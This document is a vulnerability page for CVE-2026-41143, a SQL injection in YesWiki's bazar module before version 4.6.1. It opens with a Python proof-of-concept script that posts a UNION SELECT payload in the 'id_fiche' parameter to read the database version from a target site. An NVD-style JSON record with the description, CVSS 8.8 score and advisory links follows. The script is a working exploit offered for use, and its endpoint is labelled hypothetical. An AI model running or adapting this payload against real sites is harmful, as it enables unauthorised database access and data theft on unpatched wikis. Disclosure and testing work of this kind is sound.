CVE-2026-41143

#!/usr/bin/env python3 import requests # Proof of Concept for CVE-2026-41143 # Target: YesWiki < 4.6.1 # The vulnerability exists in the 'id_fiche' parameter of the bazar module. def exploit(target_url, session_cookie): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Cookie": f"PHPSESSID={session_cookie}" } # Payload to extract database version (MySQL) # The injection point expects an ID, so we close the quote and append our query sqli_payload = "1' UNION SELECT 1,2,3,version(),5,6,7,8,9,10-- -" data = { "id_fiche": sqli_payload, # Other required POST parameters might be needed depending on the form structure } # The vulnerable endpoint is typically where EntryManager is invoked # Adjust the endpoint path if necessary based on specific YesWiki configuration url = f"{target_url}/?api/bazar/entries" # Hypothetical endpoint mapping to EntryManager try: response = requests.post(url, data=data, headers=headers, verify=False) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check response content for database version output.") print(response.text[:200]) # Print partial response else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://target-yeswiki-site.com" # Low privilege session might be required based on CVSS PR:L session = "valid_session_id_here" exploit(target, session)

{"cve": {"id": "CVE-2026-41143", "sourceIdentifier": "[email protected]", "published": "2026-05-07T06:16:04.550", "lastModified": "2026-05-07T15:43:39.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "YesWiki is a wiki system written in PHP. Prior to version 4.6.1, YesWiki bazar module contains a SQL injection vulnerability in tools/bazar/services/EntryManager.php at line 704. The $data['id_fiche'] value (sourced from $_POST['id_fiche']) is concatenated directly into a raw SQL query without any sanitization or parameterization. This issue has been patched in version 4.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/YesWiki/yeswiki/releases/tag/v4.6.1", "source": "[email protected]"}, {"url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-f58v-p6j9-24c2", "source": "[email protected]"}, {"url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-f58v-p6j9-24c2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}